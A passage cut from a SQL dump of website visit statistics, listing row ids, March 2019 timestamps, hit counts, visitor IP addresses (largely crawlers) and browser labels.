'other'),(394604,1551651631,1,1,0,0,'157.55.39.83','other'),(394605,1551651651,1,1,0,0,'46.229.168.142','other'),(394606,1551651855,2,2,0,0,'157.55.39.112','other'),(394607,1551652715,1,1,0,0,'54.36.148.50','other'),(394608,1551652885,1,1,0,0,'39.98.71.133','other'),(394609,1551653238,1,1,0,0,'46.229.168.145','other'),(394610,1551653303,1,1,0,0,'54.36.148.164','other'),(394611,1551653577,1,1,0,0,'54.36.150.81','other'),(394612,1551653596,1,1,0,0,'54.36.148.178','other'),(394613,1551654259,1,1,0,0,'54.36.150.174','other'),(394614,1551654850,1,1,0,0,'54.36.148.137','other'),(394615,1551655006,1,1,0,0,'54.36.149.59','other'),(394616,1551655075,1,1,0,0,'207.46.13.26','other'),(394617,1551655186,1,1,0,0,'54.36.150.60','other'),(394618,1551656148,1,1,0,0,'5.45.207.79','other'),(394619,1551656340,1,1,0,0,'66.249.64.29','chrome'),(394620,1551656429,1,1,0,0,'95.163.255.42','other'),(394621,1551656998,1,1,0,0,'157.55.39.118','other'),(394622,1551657097,1,1,0,0,'5.45.207.79','other'),(394623,1551657222,1,1,0,0,'54.36.149.67','other'),(394624,1551657322,2,2,0,0,'192.151.145.178','other'),(394625,1551657476,1,1,0,0,'54.36.148.112','other'),(394626,1551657715,17,17,0,0,'144.76.38.40','other'),(394627,1551657766,1,1,0,0,'54.36.148.247','other'),(394628,1551657833,1,1,0,0,'46.229.168.134','other'),(394629,1551657984,1,1,0,0,'54.36.148.0','other'),(394630,1551658475,284,284,0,0,'88.198.33.145','other'),(394631,1551658678,1,1,0,0,'207.46.13.26','other'),(394632,1551658893,1,1,0,0,'157.55.39.112','other'),(394633,1551659158,1,1,0,0,'54.36.148.182','other'),(394634,1551659832,1,1,0,0,'54.36.148.197','other'),(394635,1551659912,1,1,0,0,'46.229.168.146','other'),(394636,1551659994,1,1,0,0,'40.77.167.84','other'),(394637,1551660537,1,1,0,0,'216.244.66.241','other'),(394638,1551660610,1,1,0,0,'8.29.198.26','other'),(394639,1551660884,1,1,0,0,'8.29.198.25','other'),(394640,1551660986,1,1,0,0,'46.229.168.138','other'),(394641,1551661049,1,1,0,0,'95.108.213.4','other'),(394642,1551661051,1,1,0,0,'37.9.113.148','other'),(394643,1551661514,1,1,0,0,'157.55.39.118','other'),(394644,1551661702,1,1,0,0,'54.36.148.146','other'),(394645,1551661802,1,1,0,0,'95.163.255.44','other'),(394646,1551662300,1,1,0,0,'54.36.149.73','other'),(394647,1551662692,1,1,0,0,'54.36.148.127','other'),(394648,1551663040,1,1,0,0,'54.36.150.87','other'),(394649,1551663264,2,2,0,0,'216.244.66.241','other'),(394650,1551663479,1,1,0,0,'178.154.244.11','other'),(394651,1551663532,1,1,0,0,'87.250.224.47','other'),(394652,1551663633,1,1,0,0,'207.46.13.26','other'),(394653,1551664193,1,1,0,0,'54.36.150.23','other'),(394654,1551664235,1,1,0,0,'54.36.148.87','other'),(394655,1551664255,1,1,0,0,'207.46.13.62','other'),(394656,1551664380,1,1,0,0,'54.36.150.20','other'),(394657,1551664595,1,1,0,0,'46.229.168.135','other'),(394658,1551665060,1,1,0,0,'207.46.13.26','other'),(394659,1551665642,2,2,0,0,'54.36.148.207','other'),(394660,1551665816,1,1,0,0,'54.36.148.61','other'),(394661,1551665859,1,1,0,0,'54.36.150.116','other'),(394662,1551665950,1,1,0,0,'66.249.64.31','chrome'),(394663,1551666266,1,1,0,0,'46.229.168.146','other'),(394664,1551666350,1,1,0,0,'54.36.150.82','other'),(394665,1551666373,1,1,0,0,'216.244.66.241','other'),(394666,1551666516,1,1,0,0,'54.36.150.114','other'),(394667,1551667177,1,1,0,0,'66.249.64.58','chrome'),(394668,1551667473,1,1,0,0,'95.163.255.45','other'),(394669,1551667497,1,1,0,0,'46.229.168.143','other'),(394670,1551667587,1,1,0,0,'54.36.150.168','other'),(394671,1551667984,1,1,0,0,'54.36.150.170','other'),(394672,1551668426,1,1,0,0,'54.36.148.127','other'),(394673,1551668559,1,1,0,0,'54.36.148.139','other'),(394674,1551668763,1,1,0,0,'216.244.66.241','other'),(394675,1551668782,1,1,0,0,'46.229.168.141','other'),(394676,1551668872,1,1,0,0,'66.249.64.31','chrome'),(394677,1551669050,1,1,0,0,'46.229.168.135','other'),(394678,1551669119,1,1,0,0,'40.77.167.212','other'),(394679,1551669588,1,1,0,0,'54.36.150.155','other'),(394680,1551669770,1,1,0,0,'54.36.148.76','other'),(394681,1551669784,48,48,0,0,'173.249.30.29','other'),(394682,1551670129,1,1,0,0,'157.55.39.118','other'),(394683,1551670618,1,1,0,0,'157.55.39.197','other'),(394684,1551670692,46,46,0,0,'173.249.30.29','other'),(394685,1551671137,1,1,0,0,'54.36.149.1','other'),(394686,1551671287,1,1,0,0,'54.36.148.140','other'),(394687,1551671454,2,2,0,0,'8.29.198.26','other'),(394688,1551671499,2,2,0,0,'54.200.37.24','chrome'),(394689,1551671656,44,44,0,0,'173.249.30.29','other'),(394690,1551671676,1,1,0,0,'54.36.148.134','other'),(394691,1551671919,1,1,0,0,'54.36.150.166','other'),(394692,1551671979,1,1,0,0,'54.36.150.31','other'),(394693,1551672471,2,2,0,0,'40.77.167.48','other'),(394694,1551672562,5,5,0,0,'173.249.30.29','other'),(394695,1551672903,1,1,0,0,'54.36.150.191','other'),(394696,1551673222,1,1,0,0,'46.229.168.149','other'),(394697,1551673828,1,1,0,0,'40.77.167.49','other'),(394698,1551673887,1,1,0,0,'37.145.187.107','msie'),(394699,1551674092,1,1,0,0,'54.36.148.18','other'),(394700,1551674238,1,1,0,0,'54.36.149.7','other'),(394701,1551674283,1,1,0,0,'54.36.150.143','other'),(394702,1551674508,1,1,0,0,'54.36.150.124','other'),(394703,1551674598,1,1,0,0,'54.36.149.32','other'),(394704,1551674715,1,1,0,0,'54.36.150.188','other'),(394705,1551675208,1,1,0,0,'54.36.150.94','other'),(394706,1551675622,1,1,0,0,'54.36.148.111','other'),(394707,1551676367,1,1,0,0,'46.229.168.132','other'),(394708,1551676387,1,1,0,0,'207.46.13.161','other'),(394709,1551676948,1,1,0,0,'54.36.148.22','other'),(394710,1551676973,1,1,0,0,'46.229.168.137','other'),(394711,1551676975,1,1,0,0,'216.244.66.241','other'),(394712,1551677000,1,1,0,0,'40.77.167.48','other'),(394713,1551677272,1,1,0,0,'46.229.168.145','other'),(394714,1551677515,1,1,0,0,'66.249.64.30','chrome'),(394715,1551677785,1,1,0,0,'54.36.148.191','other'),(394716,1551677850,1,1,0,0,'54.36.149.76','other'),(394717,1551678008,1,1,0,0,'40.77.167.49','other'),(394718,1551678605,1,1,0,0,'54.36.148.157','other'),(394719,1551678973,1,1,0,0,'193.93.228.47','chrome'),(394720,1551679017,1,1,0,0,'54.36.150.55','other'),(394721,1551679265,1,1,0,0,'54.36.150.123','other'),(394722,1551679539,1,1,0,0,'54.36.150.28','other'),(394723,1551679548,1,1,0,0,'54.36.150.129','other'),(394724,1551679566,1,1,0,0,'54.36.148.147','other'),(394725,1551679602,1,1,0,0,'54.36.148.38','other'),(394726,1551679725,1,1,0,0,'54.36.150.172','other'),(394727,1551679832,1,1,0,0,'54.36.150.47','other'),(394728,1551679981,1,1,0,0,'87.120.254.204','other'),(394729,1551680224,1,1,0,0,'40.77.167.49','other'),(394730,1551680467,1,1,0,0,'54.36.150.161','other'),(394731,1551680810,1,1,0,0,'157.55.39.77','other'),(394732,1551680957,1,1,0,0,'69.171.251.3','other'),(394733,1551681121,4,4,0,0,'5.45.207.79','other'),(394734,1551681138,4,4,0,0,'178.154.244.11','other'),(394735,1551681142,7,7,0,0,'141.8.142.103','other'),(394736,1551681237,3,3,0,0,'95.108.213.4','other'),(394737,1551681596,3,3,0,0,'5.45.207.19','other'),(394738,1551681848,1,1,0,0,'54.36.150.172','other'),(394739,1551681965,1,1,0,0,'216.244.66.241','other'),(394740,1551682055,1,1,0,0,'66.249.64.29','chrome'),(394741,1551682194,6,6,0,0,'141.8.142.103','other'),(394742,1551682302,1,1,0,0,'8.29.198.27','other'),(394743,1551682372,5,5,0,0,'178.154.244.11','other'),(394744,1551682598,1,1,0,0,'8.29.198.25','other'),(394745,1551682629,3,3,0,0,'5.45.207.79','other'),(394746,1551682663,1,1,0,0,'37.9.113.148','other'),(394747,1551682829,1,1,0,0,'54.36.150.11','other'),(394748,1551682901,1,1,0,0,'207.46.13.161','other'),(394749,1551682932,3,3,0,0,'95.108.213.4','other'),(394750,1551683072,2,2,0,0,'5.45.207.19','other'),(394751,1551683217,1,1,0,0,'130.180.217.170','chrome'),(394752,1551683323,1,1,0,0,'178.154.244.11','other'),(394753,1551683675,2,2,0,0,'5.45.207.79','other'),(394754,1551683886,1,1,0,0,'95.108.213.4','other'),(394755,1551684044,1,1,0,0,'66.249.64.31','chrome'),(394756,1551684174,1,1,0,0,'178.154.171.24','other'),(394757,1551684259,1,1,0,0,'95.132.61.155','firefox'),(394758,1551684262,1,1,0,0,'207.46.13.161','other'),(394759,1551684296,1,1,0,0,'95.163.255.43','other'),(394760,1551684299,1,1,0,0,'95.163.255.45','other'),(394761,1551684328,1,1,0,0,'54.36.150.18','other'),(394762,1551684392,1,1,0,0,'66.249.64.29','chrome'),(394763,1551685323,1,1,0,0,'173.193.191.205','firefox'),(394764,1551685353,1,1,0,0,'54.36.149.42','other'),(394765,1551685471,1,1,0,0,'54.36.150.118','other'),(394766,1551685674,1,1,0,0,'207.46.13.69','other'),(394767,1551686030,1,1,0,0,'54.36.150.166','other'),(394768,1551686152,1,1,0,0,'46.211.129.167','chrome'),(394769,1551686657,1,1,0,0,'89.19.113.136','chrome'),(394770,1551686675,1,1,0,0,'54.36.148.246','other'),(394771,1551686752,2,2,0,0,'195.10.210.70','chrome'),(394772,1551687034,1,1,0,0,'157.55.39.219','other'),(394773,1551687090,3,3,0,0,'216.244.66.241','other'),(394774,1551687101,1,1,0,0,'66.249.64.30','chrome'),(394775,1551687718,1,1,0,0,'3.91.2.189','other'),(394776,1551688121,1,1,0,0,'54.36.150.88','other'),(394777,1551688174,1,1,0,0,'195.10.210.70','chrome'),(394778,1551688853,1,1,0,0,'54.36.150.182','other'),(394779,1551688972,1,1,0,0,'54.36.148.14','other'),(394780,1551689661,1,1,0,0,'195.10.210.70','chrome'),(394781,1551689828,1,1,0,0,'95.132.35.249','chrome'),(394782,1551690501,1,1,0,0,'194.113.106.125','chrome'),(394783,1551690642,2,2,0,0,'207.46.13.161','other'),(394784,1551690741,1,1,0,0,'54.36.150.73','other'),(394785,1551691302,1,1,0,0,'66.249.64.29','chrome'),(394786,1551691450,1,1,0,0,'66.249.64.30','chrome'),(394787,1551691474,1,1,0,0,'54.36.149.18','other'),(394788,1551691805,1,1,0,0,'78.154.167.41','chrome'),(394789,1551691840,1,1,0,0,'37.52.22.197','chrome'),(394790,1551692096,1,1,0,0,'54.36.149.68','other'),(394791,1551692603,2,2,0,0,'216.244.66.241','other'),(394792,1551692605,1,1,0,0,'91.196.178.82','chrome'),(394793,1551692795,1,1,0,0,'54.36.150.160','other'),(394794,1551692882,1,1,0,0,'54.36.150.176','other'),(394795,1551693153,1,1,0,0,'8.29.198.25','other'),(394796,1551693187,1,1,0,0,'107.21.1.8','other'),(394797,1551693190,1,1,0,0,'54.208.102.37','other'),(394798,1551693248,1,1,0,0,'91.196.178.136','firefox'),(394799,1551693404,1,1,0,0,'157.55.39.77','other'),(394800,1551693483,1,1,0,0,'8.29.198.26','other'),(394801,1551693848,1,1,0,0,'54.36.150.191','other'),(394802,1551694715,1,1,0,0,'54.36.148.67','other'),(394803,1551695064,1,1,0,0,'54.36.148.217','other'),(394804,1551695065,1,1,0,0,'46.211.25.155','chrome'),(394805,1551695506,1,1,0,0,'54.36.150.187','other'),(394806,1551695605,1,1,0,0,'54.36.150.71','other'),(394807,1551696526,1,1,0,0,'54.36.150.53','other'),(394808,1551696628,1,1,0,0,'46.229.168.151','other'),(394809,1551696683,1,1,0,0,'54.36.150.190','other'),(394810,1551696871,1,1,0,0,'54.36.148.13','other'),(394811,1551697117,1,1,0,0,'95.163.255.49','other'),(394812,1551697122,1,1,0,0,'54.36.150.163','other'),(394813,1551697145,1,1,0,0,'91.196.178.91','chrome'),(394814,1551697364,1,1,0,0,'54.36.148.122','other'),(394815,1551697609,1,1,0,0,'54.36.148.54','other'),(394816,1551697644,1,1,0,0,'91.196.178.90','chrome'),(394817,1551697725,1,1,0,0,'37.54.170.6','firefox'),(394818,1551698223,1,1,0,0,'66.249.64.218','chrome'),(394819,1551698508,1,1,0,0,'54.36.148.248','other'),(394820,1551698876,1,1,0,0,'94.179.147.128','chrome'),(394821,1551699060,1,1,0,0,'54.36.148.208','other'),(394822,1551699423,1,1,0,0,'5.45.207.79','other'),(394823,1551699426,1,1,0,0,'5.45.207.19','other'),(394824,1551699667,1,1,0,0,'199.16.157.180','other'),(394825,1551699799,1,1,0,0,'94.179.147.128','chrome'),(394826,1551700063,1,1,0,0,'54.36.150.168','other'),(394827,1551700156,1,1,0,0,'54.36.149.59','other'),(394828,1551700413,1,1,0,0,'46.229.168.132','other'),(394829,1551700449,1,1,0,0,'54.36.150.170','other'),(394830,1551700886,1,1,0,0,'207.46.13.224','other'),(394831,1551701428,1,1,0,0,'195.10.210.70','chrome'),(394832,1551701514,1,1,0,0,'40.77.167.109','other'),(394833,1551702009,1,1,0,0,'54.36.148.165','other'),(394834,1551702333,1,1,0,0,'91.90.10.63','chrome'),(394835,1551702510,1,1,0,0,'54.36.150.138','other'),(394836,1551702907,1,1,0,0,'54.36.150.166','other'),(394837,1551703389,1,1,0,0,'46.229.168.154','other'),(394838,1551703534,1,1,0,0,'66.249.64.220','chrome'),(394839,1551703799,1,1,0,0,'54.36.150.49','other'),(394840,1551703881,1,1,0,0,'91.225.4.21','chrome'),(394841,1551703896,1,1,0,0,'157.55.39.73','other'),(394842,1551704006,1,1,0,0,'8.29.198.25','other'),(394843,1551704060,1,1,0,0,'178.255.215.94','other'),(394844,1551704365,1,1,0,0,'8.29.198.26','other'),(394845,1551705022,1,1,0,0,'91.196.177.46','chrome'),(394846,1551705458,1,1,0,0,'54.36.150.81','other'),(394847,1551705505,1,1,0,0,'46.211.27.233','chrome'),(394848,1551705880,1,1,0,0,'54.36.150.72','other'),(394849,1551706230,1,1,0,0,'54.36.149.104','other'),(394850,1551706287,1,1,0,0,'46.211.113.22','firefox'),(394851,1551706414,1,1,0,0,'157.55.39.117','other'),(394852,1551706435,1,1,0,0,'180.76.15.144','other'),(394853,1551706457,1,1,0,0,'54.36.148.3','other'),(394854,1551706726,1,1,0,0,'176.101.199.84','chrome'),(394855,1551706959,1,1,0,0,'40.77.167.109','other'),(394856,1551707210,1,1,0,0,'46.201.49.46','firefox'),(394857,1551707315,1,1,0,0,'54.36.148.162','other'),(394858,1551707584,1,1,0,0,'54.36.150.18','other'),(394859,1551707679,1,1,0,0,'54.36.150.74','other'),(394860,1551708610,1,1,0,0,'157.55.39.117','other'),(394861,1551708753,1,1,0,0,'54.36.148.239','other'),(394862,1551708951,1,1,0,0,'159.224.26.163','chrome'),(394863,1551709034,1,1,0,0,'216.244.66.241','other'),(394864,1551709341,1,1,0,0,'46.229.168.130','other'),(394865,1551709764,1,1,0,0,'157.55.39.110','other'),(394866,1551709806,1,1,0,0,'54.36.150.191','other'),(394867,1551709862,1,1,0,0,'46.229.168.132','other'),(394868,1551709867,1,1,0,0,'46.219.6.41','chrome'),(394869,1551709871,1,1,0,0,'91.235.69.34','chrome'),(394870,1551710317,1,1,0,0,'66.249.64.218','chrome'),(394871,1551710376,1,1,0,0,'54.36.150.74','other'),(394872,1551710417,1,1,0,0,'89.200.253.208','chrome'),(394873,1551710442,1,1,0,0,'54.36.148.238','other'),(394874,1551710686,1,1,0,0,'54.36.148.218','other'),(394875,1551710887,1,1,0,0,'212.2.147.170','chrome'),(394876,1551711077,1,1,0,0,'91.202.242.81','firefox'),(394877,1551711517,1,1,0,0,'46.229.168.135','other'),(394878,1551711783,1,1,0,0,'216.244.66.241','other'),(394879,1551711797,1,1,0,0,'37.53.225.213','firefox'),(394880,1551712120,1,1,0,0,'95.163.255.47','other'),(394881,1551712124,1,1,0,0,'95.163.255.45','other'),(394882,1551712172,1,1,0,0,'54.36.148.93','other'),(394883,1551712559,1,1,0,0,'207.46.13.184','other'),(394884,1551712615,1,1,0,0,'66.249.64.218','chrome'),(394885,1551712620,2,2,0,0,'94.178.201.154','chrome'),(394886,1551712638,1,1,0,0,'54.36.150.182','other'),(394887,1551712682,2,2,0,0,'95.213.141.126','opera'),(394888,1551712711,1,1,0,0,'54.36.150.167','other'),(394889,1551712722,1,1,0,0,'46.201.181.63','firefox'),(394890,1551712806,1,1,0,0,'54.36.148.243','other'),(394891,1551712972,1,1,0,0,'157.55.39.117','other'),(394892,1551713172,1,1,0,0,'212.26.157.181','chrome'),(394893,1551713336,1,1,0,0,'46.211.113.22','chrome'),(394894,1551713559,1,1,0,0,'54.36.148.224','other'),(394895,1551713767,1,1,0,0,'54.36.150.107','other'),(394896,1551713931,2,2,0,0,'40.77.167.73','other'),(394897,1551714042,1,1,0,0,'54.36.150.2','other'),(394898,1551714290,1,1,0,0,'54.36.150.133','other'),(394899,1551714322,1,1,0,0,'178.255.215.94','other'),(394900,1551714513,1,1,0,0,'54.36.148.171','other'),(394901,1551714574,1,1,0,0,'54.36.150.101','other'),(394902,1551715045,1,1,0,0,'54.36.149.38','other'),(394903,1551715834,1,1,0,0,'8.29.198.26','other'),(394904,1551715843,1,1,0,0,'176.107.195.179','chrome'),(394905,1551715890,1,1,0,0,'54.36.149.87','other'),(394906,1551715915,1,1,0,0,'8.29.198.27','other'),(394907,1551715983,1,1,0,0,'54.36.150.115','other'),(394908,1551716450,1,1,0,0,'54.36.150.33','other'),(394909,1551716842,1,1,0,0,'157.55.39.117','other'),(394910,1551717202,1,1,0,0,'54.36.150.138','other'),(394911,1551717558,1,1,0,0,'46.229.168.148','other'),(394912,1551717596,2,2,0,0,'37.9.113.20','other'),(394913,1551717626,1,1,0,0,'5.45.207.8','other'),(394914,1551717653,1,1,0,0,'95.108.213.4','other'),(394915,1551717771,1,1,0,0,'87.250.224.81','other'),(394916,1551717878,4,4,0,0,'178.154.244.11','other'),(394917,1551718356,1,1,0,0,'178.154.244.65','other'),(394918,1551718427,1,1,0,0,'54.36.149.32','other'),(394919,1551718526,3,3,0,0,'5.45.207.19','other'),(394920,1551718564,1,1,0,0,'54.36.149.20','other'),(394921,1551718872,1,1,0,0,'54.36.148.89','other'),(394922,1551718941,2,2,0,0,'87.250.224.47','other'),(394923,1551719030,2,2,0,0,'37.9.113.148','other'),(394924,1551719057,2,2,0,0,'95.108.213.4','other'),(394925,1551719070,1,1,0,0,'54.36.148.171','other'),(394926,1551719076,2,2,0,0,'178.154.244.11','other'),(394927,1551719081,2,2,0,0,'216.244.66.241','other'),(394928,1551719198,3,3,0,0,'5.45.207.79','other'),(394929,1551719315,1,1,0,0,'54.36.148.234','other'),(394930,1551719336,4,4,0,0,'141.8.142.103','other'),(394931,1551719684,1,1,0,0,'157.55.39.117','other'),(394932,1551719743,1,1,0,0,'54.36.149.56','other'),(394933,1551719831,1,1,0,0,'54.36.148.24','other'),(394934,1551719835,1,1,0,0,'37.9.113.103','other'),(394935,1551719979,3,3,0,0,'178.154.244.11','other'),(394936,1551720016,1,1,0,0,'95.108.213.4','other'),(394937,1551720056,1,1,0,0,'54.36.150.73','other'),(394938,1551720096,1,1,0,0,'5.45.207.19','other'),(394939,1551720163,3,3,0,0,'5.45.207.79','other'),(394940,1551720198,1,1,0,0,'46.211.93.246','chrome'),(394941,1551720312,1,1,0,0,'54.36.149.9','other'),(394942,1551720313,1,1,0,0,'46.229.168.141','other'),(394943,1551720753,2,2,0,0,'5.9.97.200','other'),(394944,1551720768,1,1,0,0,'46.229.168.154','other'),(394945,1551720817,1,1,0,0,'54.36.148.39','other'),(394946,1551720952,1,1,0,0,'54.36.148.21','other'),(394947,1551721062,1,1,0,0,'5.45.207.19','other'),(394948,1551721592,1,1,0,0,'40.77.167.73','other'),(394949,1551721735,1,1,0,0,'216.244.66.241','other'),(394950,1551721742,1,1,0,0,'180.76.15.21','other'),(394951,1551722125,1,1,0,0,'91.196.178.87','firefox'),(394952,1551722288,1,1,0,0,'54.36.148.17','other'),(394953,1551722466,1,1,0,0,'54.36.148.93','other'),(394954,1551722694,1,1,0,0,'87.250.224.81','other'),(394955,1551722754,1,1,0,0,'54.36.148.254','other'),(394956,1551723162,1,1,0,0,'87.250.224.65','other'),(394957,1551723262,1,1,0,0,'54.36.150.39','other'),(394958,1551723263,1,1,0,0,'95.163.255.45','other'),(394959,1551723545,1,1,0,0,'176.113.170.104','chrome'),(394960,1551723837,1,1,0,0,'5.45.207.19','other'),(394961,1551723967,1,1,0,0,'54.36.150.43','other'),(394962,1551724053,1,1,0,0,'54.36.149.73','other'),(394963,1551724367,2,2,0,0,'40.77.167.73','other'),(394964,1551724394,1,1,0,0,'157.55.39.131','other'),(394965,1551724613,1,1,0,0,'54.36.148.163','other'),(394966,1551724695,1,1,0,0,'212.90.63.202','other'),(394967,1551724725,1,1,0,0,'54.36.149.50','other'),(394968,1551724823,1,1,0,0,'54.36.150.6','other'),(394969,1551725362,1,1,0,0,'54.36.150.75','other'),(394970,1551725728,1,1,0,0,'46.211.130.105','chrome'),(394971,1551726027,1,1,0,0,'54.36.149.86','other'),(394972,1551726192,1,1,0,0,'46.229.168.146','other'),(394973,1551726328,1,1,0,0,'54.36.148.73','other'),(394974,1551726411,1,1,0,0,'40.77.167.99','other'),(394975,1551726435,1,1,0,0,'66.249.64.58','chrome'),(394976,1551726884,2,2,0,0,'8.29.198.27','other'),(394977,1551727358,1,1,0,0,'54.36.149.84','other'),(394978,1551727418,1,1,0,0,'46.229.168.142','other'),(394979,1551727590,1,1,0,0,'54.36.148.186','other'),(394980,1551727638,1,1,0,0,'157.55.39.52','other'),(394981,1551727765,1,1,0,0,'46.229.168.137','other'),(394982,1551728159,1,1,0,0,'54.36.150.173','other'),(394983,1551728282,1,1,0,0,'54.36.150.69','other'),(394984,1551728563,1,1,0,0,'54.36.149.57','other'),(394985,1551729090,1,1,0,0,'157.55.39.131','other'),(394986,1551729138,1,1,0,0,'95.163.255.46','other'),(394987,1551729548,1,1,0,0,'212.1.93.34','firefox'),(394988,1551730005,1,1,0,0,'54.36.148.103','other'),(394989,1551730231,1,1,0,0,'54.36.148.140','other'),(394990,1551730293,1,1,0,0,'46.133.173.64','chrome'),(394991,1551730378,1,1,0,0,'46.229.168.143','other'),(394992,1551730382,1,1,0,0,'54.36.150.83','other'),(394993,1551730709,1,1,0,0,'66.249.64.218','chrome'),(394994,1551730928,1,1,0,0,'54.36.150.148','other'),(394995,1551730968,1,1,0,0,'54.36.148.62','other'),(394996,1551731089,1,1,0,0,'207.46.13.181','other'),(394997,1551731148,1,1,0,0,'54.36.150.106','other'),(394998,1551731246,1,1,0,0,'66.249.64.222','chrome'),(394999,1551731323,1,1,0,0,'54.36.148.63','other'),(395000,1551731855,1,1,0,0,'46.229.168.136','other'),(395001,1551731857,1,1,0,0,'54.36.150.134','other'),(395002,1551731897,1,1,0,0,'54.36.149.36','other'),(395003,1551732342,1,1,0,0,'54.36.150.146','other'),(395004,1551732729,1,1,0,0,'54.36.149.15','other'),(395005,1551733301,1,1,0,0,'54.36.148.153','other'),(395006,1551733388,1,1,0,0,'54.36.148.77','other'),(395007,1551733771,1,1,0,0,'157.55.39.171','other'),(395008,1551733772,1,1,0,0,'5.45.207.19','other'),(395009,1551734095,1,1,0,0,'54.36.149.14','other'),(395010,1551734159,1,1,0,0,'178.154.171.24','other'),(395011,1551734161,2,2,0,0,'5.45.207.79','other'),(395012,1551734217,1,1,0,0,'141.8.142.103','other'),(395013,1551734340,3,3,0,0,'178.154.244.11','other'),(395014,1551734425,1,1,0,0,'207.46.13.181','other'),(395015,1551734487,1,1,0,0,'95.108.181.96','other'),(395016,1551734489,1,1,0,0,'213.180.203.9','other'),(395017,1551734531,1,1,0,0,'178.154.171.27','other'),(395018,1551734548,1,1,0,0,'95.108.213.50','other'),(395019,1551734634,1,1,0,0,'157.55.39.52','other'),(395020,1551734717,1,1,0,0,'141.8.183.23','other'),(395021,1551734808,1,1,0,0,'176.9.9.94','other'),(395022,1551735044,1,1,0,0,'54.36.150.11','other'),(395023,1551735199,1,1,0,0,'66.249.64.218','chrome'),(395024,1551736290,1,1,0,0,'54.36.148.223','other'),(395025,1551736509,1,1,0,0,'54.36.149.42','other'),(395026,1551736629,1,1,0,0,'54.36.148.107','other'),(395027,1551737141,1,1,0,0,'54.36.148.209','other'),(395028,1551737207,1,1,0,0,'157.55.39.52','other'),(395029,1551737236,1,1,0,0,'46.229.168.134','other'),(395030,1551737708,1,1,0,0,'207.46.13.213','other'),(395031,1551737736,2,2,0,0,'8.29.198.26','other'),(395032,1551737941,2,2,0,0,'216.244.66.241','other'),(395033,1551738122,1,1,0,0,'54.36.149.101','other'),(395034,1551739011,1,1,0,0,'46.229.168.144','other'),(395035,1551739486,1,1,0,0,'54.36.150.145','other'),(395036,1551739696,1,1,0,0,'52.53.201.78','chrome'),(395037,1551739831,1,1,0,0,'46.229.168.142','other'),(395038,1551739921,1,1,0,0,'95.163.255.46','other'),(395039,1551739954,1,1,0,0,'54.36.148.176','other'),(395040,1551739984,1,1,0,0,'54.36.148.139','other'),(395041,1551740057,1,1,0,0,'157.55.39.250','other'),(395042,1551740143,1,1,0,0,'54.36.150.42','other'),(395043,1551740160,1,1,0,0,'178.154.244.11','other'),(395044,1551740442,1,1,0,0,'54.36.149.44','other'),(395045,1551740884,1,1,0,0,'54.36.149.15','other'),(395046,1551741070,1,1,0,0,'54.36.148.62','other'),(395047,1551741573,1,1,0,0,'207.46.13.101','other'),(395048,1551742142,1,1,0,0,'66.249.64.218','chrome'),(395049,1551742696,1,1,0,0,'66.249.64.222','chrome'),(395050,1551742736,1,1,0,0,'207.46.13.101','other'),(395051,1551743133,1,1,0,0,'216.244.66.241','other'),(395052,1551743183,1,1,0,0,'54.36.148.80','other'),(395053,1551743598,1,1,0,0,'157.55.39.250','other'),(395054,1551743737,1,1,0,0,'54.36.150.13','other'),(395055,1551744023,1,1,0,0,'54.36.149.78','other'),(395056,1551744043,1,1,0,0,'54.36.148.69','other'),(395057,1551744115,1,1,0,0,'46.229.168.130','other'),(395058,1551744150,1,1,0,0,'54.36.148.157','other'),(395059,1551744511,1,1,0,0,'54.36.149.61','other'),(395060,1551744529,1,1,0,0,'66.249.64.218','chrome'),(395061,1551744555,1,1,0,0,'54.36.150.115','other'),(395062,1551744732,1,1,0,0,'54.36.148.118','other'),(395063,1551744746,1,1,0,0,'54.36.148.138','other'),(395064,1551744748,1,1,0,0,'54.36.148.51','other'),(395065,1551745339,1,1,0,0,'54.36.148.13','other'),(395066,1551745569,1,1,0,0,'54.36.150.163','other'),(395067,1551745807,1,1,0,0,'54.36.150.51','other'),(395068,1551746146,1,1,0,0,'54.36.148.101','other'),(395069,1551746161,1,1,0,0,'54.36.148.149','other'),(395070,1551746355,1,1,0,0,'95.163.255.48','other'),(395071,1551746391,1,1,0,0,'95.163.255.42','other'),(395072,1551747129,1,1,0,0,'54.36.148.5','other'),(395073,1551747520,1,1,0,0,'157.55.39.91','other'),(395074,1551747670,1,1,0,0,'54.36.150.57','other'),(395075,1551747696,1,1,0,0,'54.36.148.25','other'),(395076,1551747714,1,1,0,0,'66.249.64.220','chrome'),(395077,1551748072,1,1,0,0,'54.36.149.103','other'),(395078,1551748080,1,1,0,0,'46.229.168.138','other'),(395079,1551748289,1,1,0,0,'54.36.150.188','other'),(395080,1551748313,1,1,0,0,'54.36.148.88','other'),(395081,1551748398,1,1,0,0,'157.55.39.209','other'),(395082,1551748596,1,1,0,0,'8.29.198.26','other'),(395083,1551748613,1,1,0,0,'157.55.39.91','other'),(395084,1551748648,1,1,0,0,'8.29.198.25','other'),(395085,1551748778,1,1,0,0,'54.36.149.19','other'),(395086,1551749248,3,3,0,0,'66.249.64.220','chrome'),(395087,1551749570,1,1,0,0,'46.229.168.150','other'),(395088,1551749606,1,1,0,0,'54.36.148.15','other'),(395089,1551749656,1,1,0,0,'54.36.148.91','other'),(395090,1551750095,1,1,0,0,'37.9.113.20','other'),(395091,1551750099,1,1,0,0,'141.8.142.103','other'),(395092,1551750187,1,1,0,0,'178.154.244.11','other'),(395093,1551750308,1,1,0,0,'54.36.148.77','other'),(395094,1551750321,1,1,0,0,'54.36.150.100','other'),(395095,1551750335,2,2,0,0,'87.250.224.47','other'),(395096,1551750370,1,1,0,0,'37.9.113.103','other'),(395097,1551750417,1,1,0,0,'5.45.207.19','other'),(395098,1551750507,1,1,0,0,'54.36.150.79','other'),(395099,1551750592,1,1,0,0,'54.36.150.3','other'),(395100,1551750685,1,1,0,0,'5.45.207.79','other'),(395101,1551750739,1,1,0,0,'178.154.171.24','other'),(395102,1551750742,1,1,0,0,'178.154.244.49','other'),(395103,1551751085,1,1,0,0,'213.180.203.48','other'),(395104,1551751257,2,2,0,0,'5.255.253.16','other'),(395105,1551751317,1,1,0,0,'178.154.171.27','other'),(395106,1551751503,3,3,0,0,'176.9.9.94','other'),(395107,1551751655,1,1,0,0,'141.8.142.103','other'),(395108,1551751666,2,2,0,0,'87.250.224.47','other'),(395109,1551751741,1,1,0,0,'68.183.156.246','other'),(395110,1551751780,1,1,0,0,'157.55.39.209','other'),(395111,1551751866,1,1,0,0,'178.154.171.69','other'),(395112,1551752290,1,1,0,0,'46.229.168.149','other'),(395113,1551752301,1,1,0,0,'66.249.64.58','chrome'),(395114,1551752315,1,1,0,0,'180.76.15.143','other'),(395115,1551752513,1,1,0,0,'207.46.13.101','o